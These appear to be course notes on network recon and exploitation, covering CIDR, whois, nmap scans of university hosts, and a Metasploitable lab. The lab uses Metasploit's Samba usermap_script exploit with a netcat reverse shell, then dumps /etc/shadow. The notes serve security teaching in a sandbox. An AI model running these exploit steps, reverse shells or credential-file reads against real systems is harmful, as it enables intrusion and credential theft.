Network Exploitation - nmap and Metasploit

Network Recon

Finding a target device to attack depends on the hacker’s objectives and may be opportunistic or targeted.

Either way, the first step in remote exploitation is to discover the target and gather After all, one cannot exploit a host that does not exist! The next step consists of gathering public information about the target, including what ports are open and which applications are available over the network.

IP Addresses

Recall an IPv4 address is specified by 4 bytes (32 bits), constituting an integer value between 0 and 2^32-1. Typically an IP address is written as four base-10 octets UUU.VVV.WWW.XXX where UUU, VVV, WWW, and XXX are in the range 0..255.

For example, the IP address of uwo.ca is 129.100.0.79. The University of Western Ontario, however, administers many hosts… an entire network in fact.

We can use the CIDR notation to specify a network range. An IP range in this notation has the form UUU.VVV.WWW.XXX/YY where YY is an integer in the range 0..32 specifying how many of the top YY bits of the IP address are fixed.

Here are some examples:

• 129.100.0.79/8 would specify that the top 8 out of 32 bits of the address are fixed, i.e., specifies all addresses that vary in the lower (32-8)=24 bits:

129.  0.  0.  0 = 10000001.00000000.00000000.00000000
129.255.255.255 = 10000001.11111111.11111111.11111111

• 129.100.0.79/32 would specify an address range were the top 32 out of 32 bits are fixed. In other words, it specifies the single IP address 129.100.0.79, i.e., just uwo.ca itself:

129.100.  0. 79 = 10000001.01100100.00000000.01001111

• 129.100.0.79/29 specifies the top 29 bits are fixed, i.e., the lower 32-29=3 bits vary. This specifies the 2^3=8hosts “closest” to uwo.ca (including itself):

129.100.  0. 72 = 10000001.01100100.00000000.01001000
129.100.  0. 79 = 10000001.01100100.00000000.01001111

• 129.100.0.79/0 specifies 0 out of 32 bits of the addressed are fixed, meaning this range spans the entire IPv4 space!

0.0.0.0 = 00000000.00000000.00000000.00000000
255.255.255.255 = 11111111.11111111.11111111.11111111

IPv6

IPv6 uses a 128-bit (16 byte) address usually represented as eight groups of 4 hexadecimal characters, for example:

2001:0db8:0a0b:12f0:0000:0000:0000:0001

which can also be expressed in a compressed form to suppress leading zeros:

2001:db8:a0b:12f0::1

Whois

Suppose a penetration tester is hired to perform an evaluation of a The University of Western Ontario. The permission to conduct this evaluation (if it were for real) would obviously exist between the tester and Western, so the tester would first want to confirm which IP addresses belong to Western.

They can start by gathering basic public information about the domain uwo.ca from the ARIN:

$ whois uwo.ca
Domain name:           uwo.ca
Domain status:         registered
Creation date:         2000/10/13
Expiry date:           2020/01/12
Updated date:          2010/10/15
DNSSEC:                Unsigned

Registrar:
    Name:              Webnames.ca Inc.
    Number:            70

Registrant:
    Name:              The University of Western Ontario

Administrative contact:
    Name:              Jeff Grieve
    Postal address:    Support Services Building Rm 4359
                       London ON N6A3K7 Canada
    Phone:             +1.5196612151
    Fax:               +1.5196613486
    Email:             jeffg@uwo.ca

Technical contact:
    Name:              Ed Gibson
    Postal address:    Support Services Building rm 4300
                       London ON N6A3K7 Canada
    Phone:             +1.5196612151
    Fax:               +1.5196613486
    Email:             noc@uwo.ca

Name servers:
    ns1.uwo.ca         129.100.2.12
    ns2.uwo.ca         129.100.2.51
    ns3.uwo.ca         129.100.74.79

Next the tester should confirm the IP range owned by Western. This is crucial for the tester not only to narrow their search space, but also to ensure they do not try to hack into a host without permission. Even if the company states its IP range in the contract, the tester would want to confirm it.

The tester might first seek to determine the IP address of the company’s main website:

$ nslookup uwo.ca
Server:   209.222.18.222
Address:  209.222.18.222#53

Non-authoritative answer:
Name: uwo.ca
Address: 129.100.0.79

We see uwo.ca has IP address 129.100.0.79. Next we can consult the Whois database to get information about the owner of this address:

$ whois 129.100.0.79

# ARIN WHOIS data and services are subject to the Terms of Use

NetRange:       129.100.0.0 - 129.100.255.255
CIDR:           129.100.0.0/16
NetName:        UWO-NET
NetHandle:      NET-129-100-0-0-1
Parent:         NET129 (NET-129-0-0-0-0)
NetType:        Direct Assignment
OriginAS:
Organization:   University of Western Ontario (UWO)
RegDate:        1987-10-27
Updated:        2014-02-28
Ref:            http://whois.arin.net/rest/net/NET-129-100-0-0-1


OrgName:        University of Western Ontario
OrgId:          UWO
Address:        Information Technology Services
Address:        1393 Western Road
Address:        Rm SSB 4352
City:           London
StateProv:      ON
PostalCode:     N6G-1G9
Country:        CA
RegDate:        1987-10-27
Updated:        2012-08-31
Ref:            http://whois.arin.net/rest/org/UWO

Here we see Western owns a class B network consisting of IPs in the range 129.100.0.0 to 129.100.255.255. We also see that Western registered uwo.ca in 1987, several years before the web was even invented! Of course they were actively using email and FTP and other early internet services.

Ports

A port is a software abstraction Just as IP addresses are used to identify machines on a network, ports identify specific applications running on a machine.

Ports can range in value from 1 to 65535

Reserved Ports

Ports in the range 1 to 1023 are reserved ports, and Unix systems require applications have root privileges to bind to these ports. This gives visitors to a site some assurance they are connecting to a valid system service initiated by the system administrator, and not some unprivileged user. For example, the typical port for ssh is 22.

nmap

nmap is a well known network scanning tool for discovering hosts and services. It has a wide range of scanning methods and plugins.

Passive Host Discovery

Passive scans are a good place to start gathering basic information about a host. They have the of benefit of being stealthy as they do not contact the host.

Using nmap you can use the -sL “list scan” option to do reverse-DNS lookups on neighboring IP addresses. For example:

$ nmap -sL www.uwo.ca/24 

will tell you the host names of all the hosts on the class A network shared by uwo.ca. This will potentially allow us to discover interesting host names, such as this one:

Nmap scan report for owl.uwo.ca (129.100.0.33)

Active Host Discovery

Active scans are less stealthy than passive scans since they actually directly contact the host. This however allows you to gain more information that you could with a passive scan alone, such as if the host is even currently online.

The -sn option in nmap performs basic host detection (i.e., skips the more detailed port scan).

$ nmap -sn <IP or hostname>/<mask>

The IANA maintains a number of special use domains for the purposes of basic illustrative examples in documents. One such domain is example.com, which you can use to provide another concrete example of nmap’s basic use:

$ nmap -sn example.com

Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:45 EST
Nmap scan report for example.com (93.184.216.34)
Host is up (0.023s latency).
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds

Port Scanning

Port scanning can used to gain information about what kinds of software and services might be available on a host. Without specifying any options, nmap will do an initial host discovery followed by a basic port scan,

$ nmap example.com

Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:45 EST
Nmap scan report for example.com (93.184.216.34)
Host is up (0.022s latency).
Not shown: 993 filtered ports
PORT     STATE  SERVICE
53/tcp   closed domain
80/tcp   open   http
443/tcp  open   https
554/tcp  closed rtsp
1119/tcp closed bnetgame
1755/tcp closed wms
1935/tcp closed rtmp

Similarly you can use this command to discover hosts and services on your home network, substitute your internal network IP range. First you need to find your own device’s IP address, which you can do in a terminal:

$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.3  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 8f80::a28:23af:fe71:b4af  prefixlen 64  scopeid 0x20<link>
        ether 4b:42:7f:45:ac:ad  txqueuelen 1000  (Ethernet)
        RX packets 71  bytes 15823 (15.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 2304 (2.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Here our IP address is 192.168.1.3 so we can proceed to scan the home network, i.e. 192.168.1.0 to 192.168.1.255 using any number of equivalent commands including:

nmap 192.168.1.0/24
nmap 192.168.1.3/24
nmap 192.168.1.*

The -sV option performs version detection of the services. This doesn’t always work, especially if the sys admins have taken steps to obfuscate it. In other cases we can learn which server version and OS the target is running. For example, we see eng.uwo.ca is running Windows:

$ nmap -sV eng.uwo.ca

Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:49 EST
Nmap scan report for eng.uwo.ca (129.100.225.244)
Host is up (0.0026s latency).
rDNS record for 129.100.225.244: ebithp8.eng.uwo.ca
Not shown: 992 filtered ports
PORT      STATE SERVICE    VERSION
22/tcp    open  tcpwrapped
80/tcp    open  http       Microsoft IIS httpd 7.0
5357/tcp  open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7937/tcp  open  rpcbind
7938/tcp  open  rpcbind
8089/tcp  open  rpcbind
49153/tcp open  msrpc      Microsoft Windows RPC
49154/tcp open  msrpc      Microsoft Windows RPC
Service Info: OS: Windows

The -A option prints a more detailed information about services, and used with the -sS option it can be reasonably fast. Metasploitable for example is made purposefully vulnerable to facilitate pen-testing education). For example, this would reveal that it is running Ubuntu on Apache 2.2.8:

80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux

Metasploit and Metasploitable

Metasploit is a customizable exploitation framework for penetration testing. It provides a (somewhat) easy to use interface for managing and deploying exploits. Metasploitable is an intentionally vulnerable version of Linux which allows us to explore exploitation techniques in a sandboxed environment.

Virtual Pen-Testing Lab

We begin downloading Metasploitable 2 (about 800MB) and Kali Linux Virtual Box image. Next we configure them to use an internal (virtual) network.

Step 1: Host Discovery

The first step will be for us to discover available hosts:

$ nmap -sn 192.168.1.1/29

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-22 10:32 EST
Nmap scan report for 192.168.1.1
Host is up (0.00026s latency).
MAC Address: 08:00:27:CB:C4:14 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.2
Host is up (0.00020s latency).
MAC Address: 08:00:27:C7:57:72 (Oracle VirtualBox virtual NIC)

Here we see a host available at 192.168.1.2

Step 2: Port Scanning

Next we can scan 192.168.1.2 to explore its port configuration. In particular we’d like to get a little more detailed information about what application versions are running so we’ll use the -sV option.

$ nmap -sV 192.168.1.2

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-22 10:33 EST
Nmap scan report for 192.168.1.2
Host is up (0.00015s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION

... <additional results> ...

139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

MAC Address: 08:00:27:C7:57:72 (Oracle VirtualBox virtual NIC)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Metasploitable is configured to have many ports open (to allow many possible avenues for exploitation). In particular we notice port 139 is running Samba 3.X. Interesting. You look up Samba on Wikipedia and read that:

Some versions of Samba 3.6.3 and lower suffer serious security issues which can allow anonymous users to gain root access to a system from an anonymous connection.

Step 3: Exploit

1. Initialize the Metasploit database and start the msfconsole:

$ service postgresql start
$ msfdb init
$ msfconsole

Next check to make sure that the database has connected. Typing:

msf > db_status

Should return:

[*] postgresql connected to msf3

The first time you run Metasploit, you should build the database cache to allow for faster searching:

msf > db_rebuild_cache

This may take 5-10 minutes, so grab a coffee, and restart msfconsole when you come back.

Next we want to search for Samba related exploits:

msf > search samba

Matching Modules
================

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------

   ...

   exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution

Here see see an Excellent-ranked Samba exploit which we can use. Next we load the exploit:

msf > use exploit/multi/samba/usermap_script 

msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

We see that this exploit requires us to specify RHOST, i.e., the remote host’s IP address, and RPORT the target port.

msf exploit(usermap_script) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(usermap_script) > set LPORT 666
LPORT => 666
msf exploit(usermap_script) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(usermap_script) > set RPORT 139
RPORT => 139
msf exploit(usermap_script) > set TARGET 0
TARGET => 0

Step 4: Payload

Now that the exploit is configured and ready, the final step is to specify the payload, i.e., the malicious code we wish to deliver via the exploit. We need to see which payloads are compatible by typing:

msf > show payloads

to receive a list. We’re going to use a netcat based reverse TCP shell:

msf > set payload cmd/unix/reverse_netcat

Now we’re ready to go:

msf exploit(usermap_script) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.3:666 
msf exploit(usermap_script) > [*] Command shell session 1 opened (192.168.1.3:666 -> 192.168.1.2:38741) at 2016-02-22 12:08:50 -0500

Now if we type sessions we get

Active sessions
===============

  Id  Type        Information  Connection
  --  ----        -----------  ----------
  1   shell unix               192.168.1.3:666 -> 192.168.1.2:38741 (192.168.1.2)

So now we want to bind to the active session:

msf exploit(usermap_script) > sessions -i 1
[*] Starting interaction with 1...

After a few moments you will be able to type commands!

cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::

Additional Resources

• NixCraft Top 30 Nmap Command Examples For Sys/Network Admins
• Metasploit tutorial for beginners
• Metasploit Unleased, a free online course on penetration testing using Metasploit.